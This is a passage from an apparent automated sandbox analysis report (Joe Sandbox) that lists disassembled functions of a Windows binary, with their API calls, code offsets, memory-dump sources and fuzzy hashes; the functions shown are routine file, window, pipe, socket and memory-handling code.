                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 2675159561-0
                                                      • Opcode ID: bdb26e60dab64998d22583583d0903c30546bc64af0138bd458182851a92edb8
                                                      • Instruction ID: a97be5ec2596e3335071a14f771a360b8d853bce6fa4c530c70adb140518a608
                                                      • Opcode Fuzzy Hash: bdb26e60dab64998d22583583d0903c30546bc64af0138bd458182851a92edb8
                                                      • Instruction Fuzzy Hash: A141F731600114AFDB109F28C895BEBBBE9EF45368F149099F909BB291C771ED45CBA0
                                                      Function 00E9CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E9CF22,?), ref: 00E9DDFD
                                                        • Part of subcall function 00E9DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E9CF22,?), ref: 00E9DE16
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00E9CF45
                                                      • MoveFileW.KERNEL32(?,?), ref: 00E9CF7F
                                                      • _wcslen.LIBCMT ref: 00E9D005
                                                      • _wcslen.LIBCMT ref: 00E9D01B
                                                      • SHFileOperationW.SHELL32(?), ref: 00E9D061
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 3164238972-1173974218
                                                      • Opcode ID: fe4c977757a958bc4a719dd0db298beca9e6b7e29c53c2d0582f83a219cba75c
                                                      • Instruction ID: 6c2ef5bd6ac9d2b5941ac15940553144269d1c430a94e09924d7fe861ef72f0a
                                                      • Opcode Fuzzy Hash: fe4c977757a958bc4a719dd0db298beca9e6b7e29c53c2d0582f83a219cba75c
                                                      • Instruction Fuzzy Hash: 614153719052189FDF16EBA4DD81ADEB7F9AF48380F1010E6E509FB142EB34A689CB50
                                                      Function 00EC2DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00EC2E1C
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2E4F
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2E84
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00EC2EB6
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00EC2EE0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EC2EF1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00EC2F0B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: 7061c8a883aeb2b37c4e4fde1b4df02a23052405ab2febe57502d7c1b58ea7e0
                                                      • Instruction ID: 09b0ddd4dec5109f3bdca4e3974d91c7759f13404089977223a733e271ece5e6
                                                      • Opcode Fuzzy Hash: 7061c8a883aeb2b37c4e4fde1b4df02a23052405ab2febe57502d7c1b58ea7e0
                                                      • Instruction Fuzzy Hash: 313106306041589FEB22DF59DE84FA937E1FB4AB14F151168FA04AF2B1CB72A846DB41
                                                      Function 00E97726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97769
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E9778F
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E97792
                                                      • SysAllocString.OLEAUT32(?), ref: 00E977B0
                                                      • SysFreeString.OLEAUT32(?), ref: 00E977B9
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E977DE
                                                      • SysAllocString.OLEAUT32(?), ref: 00E977EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: c9b1c368e4163336b5e7099ffe00e61c1d3b9fae83242cee859f15485aeff86b
                                                      • Instruction ID: 91e4426c0deb8f854711b4a9b475628bd11774839a88e9c9ad2d186de683d5c0
                                                      • Opcode Fuzzy Hash: c9b1c368e4163336b5e7099ffe00e61c1d3b9fae83242cee859f15485aeff86b
                                                      • Instruction Fuzzy Hash: 0921B276604219AFDF10DFA9DC88CBB73ACFB097657148026F954EB250D670DC8AC760
                                                      Function 00E977FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97842
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00E97868
                                                      • SysAllocString.OLEAUT32(00000000), ref: 00E9786B
                                                      • SysAllocString.OLEAUT32 ref: 00E9788C
                                                      • SysFreeString.OLEAUT32 ref: 00E97895
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00E978AF
                                                      • SysAllocString.OLEAUT32(?), ref: 00E978BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: d438da81034a4409463953e1e720dd90e71880027e011e2375f72687ab6617af
                                                      • Instruction ID: dd4e3beb8a1827a6b2023bee508af9ae43ed301a57071a02215331ba1ede2101
                                                      • Opcode Fuzzy Hash: d438da81034a4409463953e1e720dd90e71880027e011e2375f72687ab6617af
                                                      • Instruction Fuzzy Hash: DB21C131608214AFDF249FA9DC88DAA77FCFB087607148025F954EB2A0D670DC4ACB64
                                                      Function 00EA04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00EA04F2
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA052E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 60da6f98c276b99e06e6a5b16d6ed89bad8c389c40eea6dd5d8f89102ce33cee
                                                      • Instruction ID: 5ef26b28c7d9e76297eb3eb7caa3022be17a5c2315eec82f472db201c89fc3ea
                                                      • Opcode Fuzzy Hash: 60da6f98c276b99e06e6a5b16d6ed89bad8c389c40eea6dd5d8f89102ce33cee
                                                      • Instruction Fuzzy Hash: 672171719003059FDB309F69DC44A9A7BB4AF4A768F204A29E8A1FA1E0D770A955CF20
                                                      Function 00EA05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00EA05C6
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EA0601
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateHandlePipe
                                                      • String ID: nul
                                                      • API String ID: 1424370930-2873401336
                                                      • Opcode ID: 2c4246df99ed70e95c3efce9d749b9e896b992146422f963a149cb9b0bf4cfeb
                                                      • Instruction ID: 48ab17f15e78600d6ff0e8d2474a73108cdebfb965f78164ec6cdd1e3c559036
                                                      • Opcode Fuzzy Hash: 2c4246df99ed70e95c3efce9d749b9e896b992146422f963a149cb9b0bf4cfeb
                                                      • Instruction Fuzzy Hash: 832181755003059FDB209F699C04E9A77E4BFDA728F201A19F9A1FB2E0E771A865CB10
                                                      Function 00EC40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                        • Part of subcall function 00E3600E: GetStockObject.GDI32(00000011), ref: 00E36060
                                                        • Part of subcall function 00E3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EC4112
                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EC411F
                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EC412A
                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EC4139
                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EC4145
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                      • String ID: Msctls_Progress32
                                                      • API String ID: 1025951953-3636473452
                                                      • Opcode ID: d2203443568f5fd6030501eff8e2bb248556edbeb357562ddb36bc5940ed61f2
                                                      • Instruction ID: 098f204e634c71fbe527ba01c3560f81c78dfe327f4de00a3df64c68a0e95c76
                                                      • Opcode Fuzzy Hash: d2203443568f5fd6030501eff8e2bb248556edbeb357562ddb36bc5940ed61f2
                                                      • Instruction Fuzzy Hash: 1F1190B214021DBEEF218F64CC86EE77F9DEF08798F005111FA58A2090C6729C22DBA4
                                                      Function 00E6D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E6D7A3: _free.LIBCMT ref: 00E6D7CC
                                                      • _free.LIBCMT ref: 00E6D82D
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6D838
                                                      • _free.LIBCMT ref: 00E6D843
                                                      • _free.LIBCMT ref: 00E6D897
                                                      • _free.LIBCMT ref: 00E6D8A2
                                                      • _free.LIBCMT ref: 00E6D8AD
                                                      • _free.LIBCMT ref: 00E6D8B8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction ID: c963f67a7a7dd32964fa16e372d55ad4e090c8b1622c5491a7bed9ab473a886f
                                                      • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                      • Instruction Fuzzy Hash: D1115171BC4B04AAD521BFB0EC47FCB7BDC6F80780F84182AB299B6092DA65B5054751
                                                      Function 00E9DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E9DA74
                                                      • LoadStringW.USER32(00000000), ref: 00E9DA7B
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E9DA91
                                                      • LoadStringW.USER32(00000000), ref: 00E9DA98
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E9DADC
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E9DAB9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 4072794657-3128320259
                                                      • Opcode ID: 0e1bd1640be48c3430c4b7825b2067ee597019de731f4d842e34678c13c9e3e3
                                                      • Instruction ID: 837603f1b35f851bb820cf2422b486b76e6879ef5e26854255de50ad689b3ffb
                                                      • Opcode Fuzzy Hash: 0e1bd1640be48c3430c4b7825b2067ee597019de731f4d842e34678c13c9e3e3
                                                      • Instruction Fuzzy Hash: 8D0186F25002087FEB10ABA59D89EF7736CE708701F5014A6F75AF2041EA759E898F74
                                                      Function 00EA096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(011B3168,011B3168), ref: 00EA097B
                                                      • EnterCriticalSection.KERNEL32(011B3148,00000000), ref: 00EA098D
                                                      • TerminateThread.KERNEL32(00000000,000001F6), ref: 00EA099B
                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00EA09A9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EA09B8
                                                      • InterlockedExchange.KERNEL32(011B3168,000001F6), ref: 00EA09C8
                                                      • LeaveCriticalSection.KERNEL32(011B3148), ref: 00EA09CF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                      • String ID:
                                                      • API String ID: 3495660284-0
                                                      • Opcode ID: a90852645e8362b629c859448c6bb53757190fac27014afb051506615d28d25d
                                                      • Instruction ID: d7b4990389ab3412fa6c3d6e5dfd8decdaecbad81734bab78d3f8fe8f1d87d09
                                                      • Opcode Fuzzy Hash: a90852645e8362b629c859448c6bb53757190fac27014afb051506615d28d25d
                                                      • Instruction Fuzzy Hash: DEF01D31442902AFD7455B95EE88EDABA35FF45702F502025F105648B1C776A46ACF90
                                                      Function 00EB1C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00EB1DC0
                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00EB1DE1
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1DF2
                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00EB1EDB
                                                      • inet_ntoa.WSOCK32(?), ref: 00EB1E8C
                                                        • Part of subcall function 00E939E8: _strlen.LIBCMT ref: 00E939F2
                                                        • Part of subcall function 00EB3224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EAEC0C), ref: 00EB3240
                                                      • _strlen.LIBCMT ref: 00EB1F35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                      • String ID:
                                                      • API String ID: 3203458085-0
                                                      • Opcode ID: 90a92ec7713e0748d45dc482ffecd2b2dae5f0dd015a96861ced449cdc41fd0a
                                                      • Instruction ID: d4ff02aa08cb61aef4a7777f73e5a78678853f516b104d0565e354331b4114a3
                                                      • Opcode Fuzzy Hash: 90a92ec7713e0748d45dc482ffecd2b2dae5f0dd015a96861ced449cdc41fd0a
                                                      • Instruction Fuzzy Hash: DDB1C331204340AFC324DF24C895E6B7BE5AF84328F94A59CF5566B2A2CB71ED46CB91
                                                      Function 00E35D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetClientRect.USER32(?,?), ref: 00E35D30
                                                      • GetWindowRect.USER32(?,?), ref: 00E35D71
                                                      • ScreenToClient.USER32(?,?), ref: 00E35D99
                                                      • GetClientRect.USER32(?,?), ref: 00E35ED7
                                                      • GetWindowRect.USER32(?,?), ref: 00E35EF8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Rect$Client$Window$Screen
                                                      • String ID:
                                                      • API String ID: 1296646539-0
                                                      • Opcode ID: b5567c50d87188dc7cc31783bb4e0d71b30bebd32f969139141abebe7f8225a2
                                                      • Instruction ID: d3d0a9e2fc45546a0a340b1323768eae83a1c21538686a00e2741f65c7afcdf3
                                                      • Opcode Fuzzy Hash: b5567c50d87188dc7cc31783bb4e0d71b30bebd32f969139141abebe7f8225a2
                                                      • Instruction Fuzzy Hash: 89B19B75A0074ADBDB14CFA9C4447EEBBF1FF48314F14A41AE8A9E7290DB34AA51CB50
                                                      Function 00E601B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __allrem.LIBCMT ref: 00E600BA
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E600D6
                                                      • __allrem.LIBCMT ref: 00E600ED
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E6010B
                                                      • __allrem.LIBCMT ref: 00E60122
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E60140
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction ID: 63368fdb48be8acef606cf7d681cded79f5006e645e78cc2c63fc970b4387fd3
                                                      • Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
                                                      • Instruction Fuzzy Hash: 41813772B407169BE7249F28DC41B6B73E9AF413A4F24693EF451F7682E770D9008750
                                                      Function 00E661FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00E582D9,00E582D9,?,?,?,00E6644F,00000001,00000001,?), ref: 00E66258
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00E6644F,00000001,00000001,?,?,?,?), ref: 00E662DE
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00E663D8
                                                      • __freea.LIBCMT ref: 00E663E5
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • __freea.LIBCMT ref: 00E663EE
                                                      • __freea.LIBCMT ref: 00E66413
                                                      Memory Dump Source
